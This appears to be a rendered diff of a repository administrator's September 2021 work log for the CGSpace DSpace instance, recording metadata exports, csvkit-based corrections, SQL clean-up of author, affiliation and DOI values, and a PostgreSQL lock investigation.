                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              $ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p 'fuuuuuuuu'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • I added the account to the Alliance Admins account, which is should allow him to submit to any Alliance collection
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • According to my notes from 2020-10 the account must be in the admin group in order to submit via the REST API
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • @@ -371,13 +371,13 @@ ldap_sasl_bind(SIMPLE): Can't contact LDAP server (-1)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Run dspace cleanup -v process on CGSpace to clean up old bitstreams
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Export lists of authors, donors, and affiliations for Peter Ballantyne to clean up:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "dc.contributor.author", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-authors.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -COPY 80901
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.donor", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-donors.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -COPY 1274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -COPY 8091
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2021-09-23

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "dc.contributor.author", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-authors.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +COPY 80901
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.donor", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-donors.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +COPY 1274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +COPY 8091
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2021-09-23

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Peter sent me back the corrections for the affiliations
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    @@ -386,24 +386,24 @@ COPY 8091
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $ csv-metadata-quality -i ~/Downloads/2021-09-20-affiliations.csv -o /tmp/affiliations.csv -x cg.contributor.affiliation
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -$ csvgrep -c 'correct' -m 'DELETE' /tmp/affiliations.csv > /tmp/affiliations-delete.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -$ csvgrep -c 'correct' -r '^.+$' /tmp/affiliations.csv | csvgrep -i -c 'correct' -m 'DELETE' > /tmp/affiliations-fix.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -$ ./ilri/fix-metadata-values.py -i /tmp/affiliations-fix.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t 'correct' -m 211
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -$ ./ilri/delete-metadata-values.py -i /tmp/affiliations-fix.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ csv-metadata-quality -i ~/Downloads/2021-09-20-affiliations.csv -o /tmp/affiliations.csv -x cg.contributor.affiliation
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +$ csvgrep -c 'correct' -m 'DELETE' /tmp/affiliations.csv > /tmp/affiliations-delete.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +$ csvgrep -c 'correct' -r '^.+$' /tmp/affiliations.csv | csvgrep -i -c 'correct' -m 'DELETE' > /tmp/affiliations-fix.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +$ ./ilri/fix-metadata-values.py -i /tmp/affiliations-fix.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t 'correct' -m 211
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +$ ./ilri/delete-metadata-values.py -i /tmp/affiliations-fix.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Then I updated the controlled vocabulary for affiliations by exporting the top 1,000 used terms:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC LIMIT 1000) to /tmp/2021-09-23-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -$ csvcut -c 1 /tmp/2021-09-23-affiliations.csv | sed 1d > /tmp/affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC LIMIT 1000) to /tmp/2021-09-23-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +$ csvcut -c 1 /tmp/2021-09-23-affiliations.csv | sed 1d > /tmp/affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Peter also sent me 310 corrections and 234 deletions for donors so I applied those and updated the controlled vocabularies too
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Move some One CGIAR-related collections around the CGSpace hierarchy for Peter Ballantyne
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Mohammed Salem asked me for an ID to UUID mapping for CGSpace collections, so I generated one similar to the ID one I sent him in 2020-11:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    localhost/dspace63= > \COPY (SELECT collection_id,uuid FROM collection WHERE collection_id IS NOT NULL) TO /tmp/2021-09-23-collection-id2uuid.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -COPY 1139
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2021-09-24

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    localhost/dspace63= > \COPY (SELECT collection_id,uuid FROM collection WHERE collection_id IS NOT NULL) TO /tmp/2021-09-23-collection-id2uuid.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +COPY 1139
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
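The affiliation corrections in the 2021-09-23 entry are split into a deletions file and a fixes file with two `csvgrep` calls. The same split can be sketched in Python, which may help when checking the two sets before applying them. This is only an illustration: the function name `split_corrections` and the sample rows are hypothetical, and it assumes the marker is matched as a substring of the `correct` column (my understanding of `csvgrep -m`) and that any other non-empty value is a fix.

```python
import csv
import io


def split_corrections(rows, column="correct", delete_marker="DELETE"):
    """Split correction rows into (deletions, fixes).

    Assumption: a row is a deletion when `delete_marker` occurs in the
    `column` value, and a fix when the value is non-empty otherwise.
    Rows with an empty value are left out of both lists.
    """
    deletions, fixes = [], []
    for row in rows:
        value = row.get(column) or ""
        if delete_marker in value:
            deletions.append(row)
        elif value:
            fixes.append(row)
    return deletions, fixes


# Hypothetical sample data standing in for /tmp/affiliations.csv
sample = io.StringIO(
    "cg.contributor.affiliation,correct\n"
    "Wageningen Univ,Wageningen University\n"
    "asdf,DELETE\n"
    "CIAT,\n"
)
deletions, fixes = split_corrections(csv.DictReader(sample))
print(len(deletions), "deletions,", len(fixes), "fixes")
```

Keeping the two lists separate makes it harder to pass the fixes to the deletion step by mistake.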

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2021-09-24

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Peter and Abenet agreed that we should consider converting more of our UPPER CASE metadata values to Title Case
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        @@ -435,33 +435,33 @@ COPY 1139
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    localhost/dspace63= > UPDATE metadatavalue SET text_value=INITCAP(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=231;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -UPDATE 2903
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.coverage.subregion" FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 231) to /tmp/2021-09-24-subregions.txt;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -COPY 1200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      localhost/dspace63= > UPDATE metadatavalue SET text_value=INITCAP(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=231;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +UPDATE 2903
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.coverage.subregion" FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 231) to /tmp/2021-09-24-subregions.txt;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +COPY 1200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
• Then I processed the list for matches with my subdivision-lookup.py script and extracted only the values that matched:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ ./ilri/subdivision-lookup.py -i /tmp/2021-09-24-subregions.txt -o /tmp/subregions.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ csvgrep -c matched -m 'true' /tmp/subregions.csv | csvcut -c 1 | sed 1d > /tmp/subregions-matched.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ wc -l /tmp/subregions-matched.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -81 /tmp/subregions-matched.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ ./ilri/subdivision-lookup.py -i /tmp/2021-09-24-subregions.txt -o /tmp/subregions.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ csvgrep -c matched -m 'true' /tmp/subregions.csv | csvcut -c 1 | sed 1d > /tmp/subregions-matched.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ wc -l /tmp/subregions-matched.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +81 /tmp/subregions-matched.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
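The filtering step above can also be sketched in Python for readers without csvkit. This is only an illustration, not what was run: it assumes the lookup script writes a CSV with a header row and a `matched` column (as the `csvgrep` call implies), and that `csvgrep -m` does substring matching, which is my understanding of csvkit. The `subregion` column name and the sample rows are hypothetical.

```python
import csv
import io


def matched_first_column(csv_text, flag_column="matched", needle="true"):
    """Return first-column values of rows whose flag column contains needle.

    Roughly mirrors: csvgrep -c matched -m 'true' | csvcut -c 1 | sed 1d
    """
    reader = csv.reader(io.StringIO(csv_text))
    header = next(reader)  # skip the header row, like `sed 1d`
    flag_index = header.index(flag_column)
    return [row[0] for row in reader if needle in row[flag_index]]


# Hypothetical sample; the real /tmp/subregions.csv is not reproduced here.
sample = "subregion,matched\nExample A,true\nExample B,false\nExample C,true\n"
print(matched_first_column(sample))
```

Counting the returned list plays the role of the `wc -l` check.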
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Then I updated the controlled vocabulary in the submission forms
• I did the same for dcterms.audience, taking special care with a few all-caps values:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        localhost/dspace63= > UPDATE metadatavalue SET text_value=INITCAP(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value != 'NGOS' AND text_value != 'CGIAR';
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -localhost/dspace63= > UPDATE metadatavalue SET text_value='NGOs' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = 'NGOS';
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          localhost/dspace63= > UPDATE metadatavalue SET text_value=INITCAP(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value != 'NGOS' AND text_value != 'CGIAR';
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +localhost/dspace63= > UPDATE metadatavalue SET text_value='NGOs' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = 'NGOS';
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
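To make the intent of those two statements easier to check, here is a minimal Python sketch of the same rule: title-case everything except `CGIAR`, and rewrite `NGOS` as `NGOs`. The `initcap` helper is my own approximation of PostgreSQL's `INITCAP` for ASCII text (words being runs of letters and digits), and the function names and sample values are hypothetical.

```python
import re

# Values left untouched, and values with a fixed replacement (from the SQL above).
KEEP_AS_IS = {"CGIAR"}
SPECIAL_CASES = {"NGOS": "NGOs"}


def initcap(text):
    """Approximate PostgreSQL INITCAP for ASCII: capitalize each alphanumeric word."""
    return re.sub(
        r"[A-Za-z0-9]+",
        lambda m: m.group(0)[0].upper() + m.group(0)[1:].lower(),
        text,
    )


def normalize_audience(value):
    """Apply the all-caps exceptions first, then fall back to initcap."""
    if value in KEEP_AS_IS:
        return value
    if value in SPECIAL_CASES:
        return SPECIAL_CASES[value]
    return initcap(value)


# Hypothetical input values, for illustration only.
for value in ["POLICY MAKERS", "NGOS", "CGIAR", "scientists"]:
    print(value, "->", normalize_audience(value))
```

Like the SQL, this only special-cases the exact strings `NGOS` and `CGIAR`; other spellings go through the title-casing path.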
• Updated the submission form comment for DOIs because it was still recommending the “dx.doi.org” format, even though I have batch updated all DOIs to the “doi.org” format a few times in the last year
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Then I updated all existing metadata to the new format again:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'https://dx.doi.org', 'https://doi.org') WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 220 AND text_value LIKE 'https://dx.doi.org%';
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -UPDATE 49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2021-09-26

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'https://dx.doi.org', 'https://doi.org') WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 220 AND text_value LIKE 'https://dx.doi.org%';
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +UPDATE 49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
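The same rewrite can be expressed as a plain prefix swap, which avoids treating the dots in the hostname as regex wildcards. This is a sketch of the rule rather than the statement that was run; the function name and the example DOIs are hypothetical.

```python
OLD_PREFIX = "https://dx.doi.org"
NEW_PREFIX = "https://doi.org"


def normalize_doi(value):
    """Swap the old resolver prefix for the new one; leave other values alone."""
    if value.startswith(OLD_PREFIX):  # same condition as LIKE 'https://dx.doi.org%'
        return NEW_PREFIX + value[len(OLD_PREFIX):]
    return value


# Hypothetical DOI values, for illustration only.
print(normalize_doi("https://dx.doi.org/10.1234/example"))
print(normalize_doi("https://doi.org/10.1234/example"))
```

Values that already use the “doi.org” format pass through unchanged, so the function is safe to run repeatedly.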

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2021-09-26

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Mohammed Salem told me last week that MELSpace and WorldFish have been upgraded to DSpace 6 so I updated the repository setup in AReS to use the UUID field instead of IDs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              @@ -489,26 +489,26 @@ UPDATE 49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ csvcut -c 'id,collection,dc.title[en_US]' ~/Downloads/10568-106990.csv > /tmp/2021-09-28-alliance-reports.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            $ csvcut -c 'id,collection,dc.title[en_US]' ~/Downloads/10568-106990.csv > /tmp/2021-09-28-alliance-reports.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • She sent it back fairly quickly with a new column marked “Move” so I extracted those items that matched and set them to the new owning collection:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            $ csvgrep -c Move -m 'Yes' ~/Downloads/2021_28_09_alliance_reports_csv.csv | csvcut -c 1,2 | sed 's_10568/106990_10568/111506_' > /tmp/alliance-move.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              $ csvgrep -c Move -m 'Yes' ~/Downloads/2021_28_09_alliance_reports_csv.csv | csvcut -c 1,2 | sed 's_10568/106990_10568/111506_' > /tmp/alliance-move.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Maria from the Alliance emailed us to say that approving submissions was slow on CGSpace
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • I looked at the PostgreSQL activity and it seems low:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              postgres@linode18:~$ psql -c 'SELECT * FROM pg_stat_activity' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -59
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                postgres@linode18:~$ psql -c 'SELECT * FROM pg_stat_activity' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +59
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Locks look high though:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | sort | uniq -c | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -1154
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | sort | uniq -c | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +1154
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Indeed it seems something started causing locks to increase yesterday:

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PostgreSQL locks week

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  @@ -520,9 +520,9 @@ UPDATE 49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • The number of DSpace sessions is normal, hovering around 1,000…
 • Looking closer at the PostgreSQL activity log, I see the locks are all held by the dspaceCli user… which seems weird:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                postgres@linode18:~$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name='dspaceCli';" | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -1096
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  postgres@linode18:~$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name='dspaceCli';" | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +1096
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Now I’m wondering why there are no connections from dspaceApi or dspaceWeb. Could it be that our Tomcat JDBC pooling via JNDI isn’t working?
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • I see the same thing on DSpace Test hmmmm
@@ -536,14 +536,14 @@ UPDATE 49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Export a list of ILRI subjects from CGSpace to validate against AGROVOC for Peter and Abenet:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      localhost/dspace63= > \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 203) to /tmp/2021-09-29-ilri-subject.txt;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -COPY 149
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        localhost/dspace63= > \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 203) to /tmp/2021-09-29-ilri-subject.txt;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +COPY 149
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Then validate and format the matches:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ ./ilri/agrovoc-lookup.py -i /tmp/2021-09-29-ilri-subject.txt -o /tmp/2021-09-29-ilri-subjects.csv -d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -$ csvcut -c subject,'match type' /tmp/2021-09-29-ilri-subjects.csv | sed -e 's/match type/matched/' -e 's/\(alt\|pref\)Label/yes/' > /tmp/2021-09-29-ilri-subjects2.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ ./ilri/agrovoc-lookup.py -i /tmp/2021-09-29-ilri-subject.txt -o /tmp/2021-09-29-ilri-subjects.csv -d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +$ csvcut -c subject,'match type' /tmp/2021-09-29-ilri-subjects.csv | sed -e 's/match type/matched/' -e 's/\(alt\|pref\)Label/yes/' > /tmp/2021-09-29-ilri-subjects2.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • I talked to Salem about depositing from MEL to CGSpace
